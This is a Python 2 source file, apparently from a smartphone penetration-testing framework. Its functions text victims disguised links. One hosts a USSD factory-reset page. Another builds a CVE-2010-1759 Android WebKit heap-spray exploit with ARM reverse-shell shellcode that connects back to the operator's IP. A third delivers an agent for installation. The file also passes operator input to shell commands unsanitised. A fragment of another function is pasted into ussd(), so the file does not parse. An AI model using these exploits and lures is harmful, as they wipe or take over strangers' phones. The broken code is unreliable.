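def delivery(key, command, deliverymethod, returnmethod, control, explicit=False):
    """Write one command line to a control file.

    Args:
        key: Control key; first field of the line when ``explicit`` is false.
        command: Command text. Written unchanged when ``explicit`` is true.
        deliverymethod: Delivery-method field of the line.
        returnmethod: Return-method field; "HTTP" is written as an empty field.
        control: Path of the file to write. "" or None selects
            ``webroot + "spf/putfunc"``.
        explicit: True when ``command`` is already a complete line.

    Returns:
        0 once the file has been written; 1 when the return method is "SMS"
        and get_modem() returns 0, in which case nothing is written.
    """
    global webroot

    if returnmethod == "HTTP":
        returnmethod = ""

    if control == "" or control is None:
        # NOTE(review): the default file sits below `webroot` and the line
        # written to it begins with the control key. Presumably that directory
        # is served over HTTP -- confirm it is not readable without
        # authentication.
        control = webroot + "spf/putfunc"

    # `== False` is kept on purpose so that 0 and False select this branch
    # exactly as before, while None does not.
    if explicit == False:
        fields = (key, command, deliverymethod, returnmethod)
        command = "%s %s %s %s" % fields

        if returnmethod == "SMS":
            modem = get_modem()

            if modem == 0:
                # A single parenthesised argument prints the same text under
                # both the print statement and the print function.
                print("\n[!] No modems found. Attach a modem to use this functionality\n")
                return 1

            # assumes get_modem() returns a string on success -- TODO confirm
            command += modem + "\n"

        elif returnmethod == "":
            command += "\n"

    # The context manager closes the handle even when write() raises, which
    # the earlier open()/write()/close() sequence did not guarantee.
    with open(control, "w") as handle:
        handle.write(command)

    return 0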
def send_sms(key):
    """Prompt for a number, a message and a delivery method, then pass a SPAM line to delivery().

    Args:
        key: Control key placed first on the command line.

    Returns:
        Whatever delivery() returns.
    """
    print color(
        35,
        "\n[*] Send an SMS message to another phone. Fill in the number, the message to send, and the delivery method.\n",
    )
    # All three values are taken from the operator as typed; nothing is
    # validated before being formatted into the command line.
    sendnumber = str(raw_input(color(33, "[-] Number: ")))
    sendmessage = str(raw_input(color(33, "[-] Message: ")))
    deliverymethod = str(raw_input(color(33, "[-] Delivery Method(SMS or HTTP): ")))

    # NOTE(review): `is` tests object identity, not equality. Whether a string
    # read from raw_input is the same object as the literal depends on the
    # interpreter, so neither branch below is guaranteed to run.
    if deliverymethod is "HTTP":
        command = "%s SPAM none %s %s %s\n" % (key, deliverymethod, sendnumber, sendmessage)

    if deliverymethod is "SMS":
        modem = get_modem()
        if modem is 0:
            print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
        else:
            command = "%s SPAM %s %s %s %s\n" % (key, modem, deliverymethod, sendnumber, sendmessage)

    # NOTE(review): `command` is unbound here when no branch above assigned it
    # (including the no-modem case, which prints but does not return).
    # delivery() as defined in this file also takes deliverymethod,
    # returnmethod and control without defaults; this call does not pass them.
    x = delivery(key=key, command=command, explicit=True)
    return x
def ussd(ussd=None):
    """Write two HTML pages that frame a tel: URI and drive a modem to text a link to them.

    The pages are created under the configured web root; each contains a
    frame whose source is ``tel:`` followed by the USSD code. The warning
    printed below states that the default code can factory-reset a phone
    that is vulnerable.

    Args:
        ussd: USSD code to embed; None selects the built-in default.
            Note that the parameter has the same name as the function.

    Returns:
        0 on the paths visible in the USB branch and when no modem is found.
    """
    webroot   = config.get('Web', 'webroot')
    ipaddress = config.get('Web', 'ipaddress')

    if ussd == None:
        ussd = "*2767*3855%23"

    # Defensive context: per the warning text, only handsets that are
    # "vulnerable" act on the code. Presumably that means a dialer that runs
    # a code from a tel: link without asking the user -- confirm.
    print ''
    print color(31, "[!] WARNING: THIS CAN FACTORY RESET YOUR PHONE IF VULNERABLE.")
    print color(31, "[ ] FOR PROOF OF CONCEPT USE ONLY!")
    print color(31, "[ ] USE THE SAFE VERSION ON PENTESTS")
    print ''

    path     = str(raw_input(color(33, "[-] Hosting Path (%s+input): " % webroot)))
    filename = str(raw_input(color(33, "[-] Filename: "              )))
    number   = str(raw_input(color(33, "[-] Phone Number to Attack: ")))

    # Indexing [0] raises IndexError when the operator enters an empty string.
    if path[0] != '/':
        path = '/'+path

    if filename[0] != '/':
        filename = '/'+filename

    link     = "http://"+ipaddress+path+filename

    # NOTE(review): the three system() calls below pass operator input to a
    # shell by string concatenation, so shell metacharacters in the path or
    # filename are interpreted on this host. os.makedirs() and os.chmod()
    # would avoid the shell; open(..., 'w') below already creates the file.
    fullpath = webroot+path
    command1 = "mkdir "+fullpath
    system(command1)

    sploitfile = fullpath+filename
    command8 = "touch "+sploitfile
    system(command8)

    # NOTE(review): mode 777 leaves a file under the web root writable by
    # every local account, so the served content can be replaced by any of them.
    command9 = "chmod 777 "+sploitfile
    system(command9)

    # File modification here
    sploit2  = "/redirect.html"
    sploitfile2 = fullpath+sploit2
    # First page: refreshes to redirect.html after one second and frames the
    # tel: URI.
    text = ['<html>\n',
            '\t<head>\n',
            '\t\t<meta http-equiv="refresh" content="1;url=http://'+ipaddress+path+sploit2+'">\n',
            '\t</head>\n',
            '\t<frameset>\n',
            '\t\t<frame src="tel:'+ussd+'" />\n',
            '\t</frameset>\n',
            '</html>\n'
           ]

    file = open(sploitfile, 'w')
    file.writelines(text)
    file.close()

    command8 = "touch "+sploitfile2
    system(command8)

    command9 = "chmod 777 "+sploitfile2
    system(command9)

    # Second page (redirect.html): the same frame without the refresh.
    text2 = ['<html>\n',
             '\t<frameset>\n',
             '\t\t<frame src="tel:'+ussd+'" />\n',
             '\t</frameset>\n',
             '</html>\n'
            ]

    file = open(sploitfile2, 'w')
    file.writelines(text2)
    file.close()

    modem = get_modem()
    if modem == 0:
        print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
        return 0
    cursor = db.cursor()

    # NOTE(review): the three queries are assembled with % formatting. The
    # column names are literals, but `modem` is interpolated as-is; passing it
    # as a bound parameter to cursor.execute() would be the safer form.
    pathquery      = 'SELECT %s from modems where id=%s' % ('path', modem)
    cursor.execute(pathquery)
    results        = cursor.fetchall()
    path2          = results[0]

    keyquery       = 'SELECT %s from modems where id=%s' % ('controlkey', modem)
    cursor.execute(keyquery)
    results        = cursor.fetchall()
    key2           = results[0]

    modemtypequery = 'SELECT %s from modems where id=%s' % ('type', modem)
    cursor.execute(modemtypequery)
    results        = cursor.fetchall()
    modemtype2     = results[0]

    if modemtype2 == 'usb':
        try:
            # Serial device path and line settings are hard-coded.
            usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
            usb.write('ATZ\r\n')
            sleep(1)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.write('AT+CMGF=1\r\n')
            line = read_modem(usb)
            print line
            sleep(1)

            numberline = 'AT+CMGS="%s"\r\n' % number
            usb.write(numberline)
            line = read_modem(usb)
            print line
            sleep(1)

            # The text the recipient would see, followed by the hosted link.
            msg = 'This is a cool page: %s' % link
            usb.write(struct.pack('b',26, msg))
            sleep(2)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.close()
                
            print color(32, '[+] Data sent!')
            return 0
        except Exception, e:
            print color(31, '[!] Error: %s' % e)
            # NOTE(review): inside this function `ussd` is the string
            # parameter, not the function, so this is not a retry of ussd().
            x = ussd()
            return x
        # NOTE(review): from here to the end of the block the code uses
        # returnmethod, control, explicit, key, command and deliverymethod,
        # none of which ussd() defines, and the `except` on the next-but-one
        # line has no `try` at its indent. This looks like part of another
        # function pasted in; the file cannot be parsed as written.
        returnmethod = returnmethod.lower()
    except Exception, e:
        print color(31, '[!] Error: %s' % e)
        return 1

    if returnmethod is 'http':
        returnmethod = ''

    if control in ('', None):
        control = webroot + 'spf/putfunc'

    if explicit is False:
        command = '%s %s %s %s' % (key, command, deliverymethod, returnmethod)   

        if returnmethod is 'sms':
            modem = get_modem()

            if modem is 0:
                print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
                # Exit here to prevent writing to file
                return 1
            else:
                command += modem + '\n'

        elif returnmethod is '':
            command += '\n'

    file = open(control, 'w')
    file.write(command)
    file.close()
def client_side():
    """Offer a one-entry menu and, for entry 1, host a page, text its link and wait for a connection.

    For entry 1 the function prompts for a hosting path, filename, local IP
    address and phone number, writes an HTML page under the configured web
    server directory, drives the modem to send the link, then opens a TCP
    socket on ``shellipaddress`` port 12345 and records the outcome in the
    ``client`` table.

    Returns:
        0 when the menu returns 0 or "Error" and at the end of entry 1;
        1 when no modem is found or for any other menu value.
    """
    # TODO: fix a lot
    webserver = config.get("Web", "server")
    # ipaddress      = config.get('Web', 'ipaddress')
    shellipaddress = config.get("Web", "shellipaddress")

    # Defensive context: the only entry names a WebKit CVE on Android.
    # Presumably only devices whose browser predates the fix for that CVE are
    # affected -- confirm against the vendor advisory.
    cs = ["CVE 2010-1759 Webkit Vuln Android"]

    choice = menu(cs)

    if choice in (0, "Error"):
        return 0

    elif choice == 1:
        # Operator input; none of it is validated before use below.
        path = str(raw_input(color(33, "[-] Hosting Path: ")))
        filename = str(raw_input(color(33, "[-] Filename: ")))
        ipaddress = str(raw_input(color(33, "[-] Local IP address: ")))
        number = str(raw_input(color(33, "[-] Phone Number to Attack: ")))

        link = "http://%s%s%s" % (ipaddress, path, filename)

        # NOTE(review): the system() calls in this block hand operator input
        # to a shell through string formatting, so shell metacharacters are
        # interpreted on this host. os.makedirs() and os.chmod() avoid the shell.
        fullpath = webserver + path
        command1 = "mkdir %s" % fullpath
        system(command1)

        # Four values derived from the dotted octets of shellipaddress, used
        # for the `ip` line of the page below.
        octets = shellipaddress.split(".")

        out1 = struct.pack("b", int(octets[0]))
        hex1 = hex(out1)

        out2 = struct.pack("b", int(octets[1]))
        hex2 = hex(out2)

        out3 = struct.pack("b", int(octets[2]))
        hex3 = hex(out3)

        out4 = struct.pack("b", int(octets[3]))
        hex4 = hex(out4)

        sploitfile = "%s%s" % (fullpath, filename)
        command8 = "touch %s" % sploitfile
        system(command8)

        # NOTE(review): mode 777 leaves the served file writable by every
        # local account.
        command9 = "chmod 777 %s" % sploitfile
        system(command9)

        file = open(sploitfile, "w")
        # Page content. Every line is a fixed literal except the `ip` line,
        # which concatenates the four values computed above.
        text = [
            "<html>\n",
            "<head>\n",
            "<script>\n",
            'var ip = unescape("\\u' + hex2 + hex1 + "\\u" + hex4 + hex3 + '");\n',
            'var port = unescape("\\u3930");\n',
            "function trigger()\n",
            "{\n",
            'var span = document.createElement("div");\n',
            'document.getElementById("BodyID").appendChild(span);\n',
            'span.innerHTML = -parseFloat("NAN(ffffe00572c60)");\n',
            "}\n",
            "function exploit()\n",
            "{\n",
            'var nop = unescape("\\u33bc\\u0057");\n',
            "do\n",
            "{\n",
            "nop+=nop;\n",
            "} while (nop.length<=0x1000);\n",
            'var scode = nop+unescape("\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002");\n',
            "scode += port;\n",
            "scode += ip;\n",
            'scode += unescape("\\u2000\\u2000");\n',
            "target = new Array();\n",
            "for(i = 0; i < 0x1000; i++)\n",
            "target[i] = scode;\n",
            "for (i = 0; i <= 0x1000; i++)\n",
            "{\n",
            'document.write(target[i]+"<i>");\n',
            "if (i>0x999)\n",
            "{\n",
            "trigger();\n",
            "}\n",
            "}\n",
            "}\n",
            "</script>\n",
            "</head>\n",
            '<body id="BodyID">\n',
            "Enjoy!\n",
            "<script>\n",
            "exploit();\n",
            "</script>\n",
            "</body>\n",
            "</html>\n",
        ]
        file.writelines(text)
        file.close()

        modem = get_modem()
        if modem == 0:
            print color(31, "\n[!] No modems found. Attach a modem to use this functionality\n")
            return 1

        # Read SQL vars from config
        sqlserver = config.get("SQL", "server")
        username = config.get("SQL", "username")
        password = config.get("SQL", "password")

        # NOTE(review): `db` is assigned here and declared `global` further
        # down in the same function; the declaration has to come first.
        db = MySQLdb.connect(sqlserver, username, password, "framework")

        # NOTE(review): queries are built with % formatting. The column names
        # are literals, but `modem` is interpolated as-is; a bound parameter
        # would be the safer form.
        pathquery = "SELECT %s from modems where id=%s" % ("path", modem)
        path2 = db_exec_rows(pathquery)

        keyquery = "SELECT %s from modems where id=%s" % ("controlkey", modem)
        key2 = db_exec_rows(keyquery)

        modemtypequery = "SELECT %s from modems where id=%s" % ("type", modem)
        modemtype2 = db_exec_rows(modemtypequery)

        if modemtype2 == "usb":
            # Interface with USB modem
            # Serial device path and line settings are hard-coded.
            usb = serial.serialposix(port="/dev/ttyUSB2", baudrate=115200, bytesize=8, parity="N", stopbits=1)
            usb.write("ATZ\r\n")
            sleep(1)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.write("AT+CMGF=1\r\n")
            line = read_modem(usb)
            print line
            sleep(1)

            numberline = 'AT+CMGS="%s"\r\n' % number
            usb.write(numberline)
            line = read_modem(usb)
            print line
            sleep(1)

            # The text the recipient would see, followed by the hosted link.
            msg = "This is a cool page: %s" % link
            usb.write(struct.pack("b", 26, msg))
            sleep(2)

            line = read_modem(usb)
            print line
            sleep(1)

            usb.close()

        elif modemtype2 == "app":
            # Interface with app-based modem
            # The key, number and link are written to a getfunc file below the
            # web server directory.
            control = "%s%s/getfunc" % (webserver, path2)
            command2 = "%s SEND %s This is a cool page: %s" % (key2, number, link)

            file = open(control, "w")
            file.write(command2)
            file.close()

        vulnerable = "no"

        # socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
        # NOTE(review): this section reads like an unfinished port of the Perl
        # line quoted above; `data_socket` is never assigned in this block, so
        # the "vulnerable" result recorded below should be treated as unverified.
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((str(shellipaddress), 12345))

        if data_socket == socket.accept():
            data = "/system/bin/id\n"

            data_socket.write(data)
            data = data_socket()

            print data
            close(data_socket)

            vulnerable = "yes"
            print color(32, "\n[+] Vulnerable: %s\n" % vulnerable)

            table = "client"
            global db

            # NOTE(review): the phone number typed by the operator is wrapped
            # in double quotes and formatted straight into the INSERT, so a
            # quote in the input changes the statement. Bound parameters in
            # cursor.execute() would remove that.
            number2 = '"%s"' % number
            vulnerable2 = '"%s"' % vulnerable
            webkit = '"webkit"'
            insertquery = "INSERT INTO %s (id,number,exploit,vuln) VALUES (DEFAULT,%s,%s,%s)" % (
                table,
                number2,
                webkit,
                vulnerable2,
            )
            cursor = db.cursor()
            sql = cursor.execute(insertquery)
        return 0

    return 1
def direct_download():
    """Copy the Android agent under the web server directory and text a link to it.

    Prompts for a hosting path, a filename and a phone number, copies the
    file named by the global ``location`` to that path, then sends the link
    through a USB modem (AT commands) or an app-based modem (getfunc file).

    Returns:
        0 on every visible path, including when no modem is found.
    """
    #TODO: cleanup
    webserver = config.get('Web', 'server')
    ipaddress = config.get('Web', 'ipaddress')

    print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n')
    print color(31, '[!] ONLY Android currently Supported')

    #platform = str(raw_input('Platform(Android/iPhone/Blackberry): '))
    platform = 'android'

    # Lots of potential for error with the way this is handled, would
    # prefer safer execution
    path     = str(raw_input(color(33, '[-] Hosting Path: '          )))
    filename = str(raw_input(color(33, '[-] Filename: '              )))
    number   = str(raw_input(color(33, '[-] Phone Number to Attack: ')))

    if platform.lower() == 'android':
        # Defensive context: the recipient gets a plain-HTTP link to a file
        # hosted on `ipaddress`. An unsolicited text asking to install an app
        # from a bare IP address is the indicator a user or a mobile filter
        # can act on.
        link = 'http://%s%s%s' % (ipaddress, path, filename)
        fullpath = '%s%s' % (webserver, path)
        # NOTE(review): both system() calls below pass operator input to a
        # shell through string formatting, so shell metacharacters in the path
        # or filename are interpreted on this host. os.makedirs() and
        # shutil.copy() would avoid the shell.
        command1 = 'mkdir %s' % fullpath
        system(command1)

        global location # Android agent location
        command = 'cp %s %s%s%s'% (location, webserver, path, filename)
        system(command)

        modem = get_modem()
        if modem == 0:
            print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
            return 0
        else:
            # NOTE(review): queries are built with % formatting. The column
            # names are literals, but `modem` is interpolated as-is; a bound
            # parameter would be the safer form.
            pathquery      = "SELECT %s from modems where id=%s" % ('path', modem)
            path2          = db_exec_rows(pathquery)

            keyquery       = "SELECT %s from modems where id=%s" % ('controlkey', modem)
            key2           = db_exec_rows(keyquery)

            modemtypequery = "SELECT %s from modems where id=%s" % ('type', modem)
            modemtype2     = db_exec_rows(modemtypequery)

            if modemtype2 == 'usb':
                # Serial device path and line settings are hard-coded.
                usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
                usb.write('ATZ\r\n')
                sleep(1)

                line = read_modem(usb)
                print line
                sleep(1)

                usb.write('AT+CMGF=1\r\n')
                line = read_modem(usb)
                print line
                # NOTE(review): the next line is indented with tabs while the
                # rest of the block uses spaces.
		sleep(1)

                numberline = 'AT+CMGS="%s"\r\n' % number
                usb.write(numberline)
                line = read_modem(usb)
                print line
                sleep(1)

                # The text the recipient would see, followed by the hosted link.
                msg = 'This is a cool app: %s' % link
                usb.write(struct.pack('b', 26, msg))
                sleep(5)

                line = read_modem(usb)
                print line
                sleep(1)

                usb.close()

            elif modemtype2 == 'app':
                # The key, number and link are written to a getfunc file below
                # the web server directory.
                control  = '%s%s/getfunc' % (webserver, path2)
                command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link)

                file = open(control, 'w')
                file.write(command2)
                file.close()
    return 0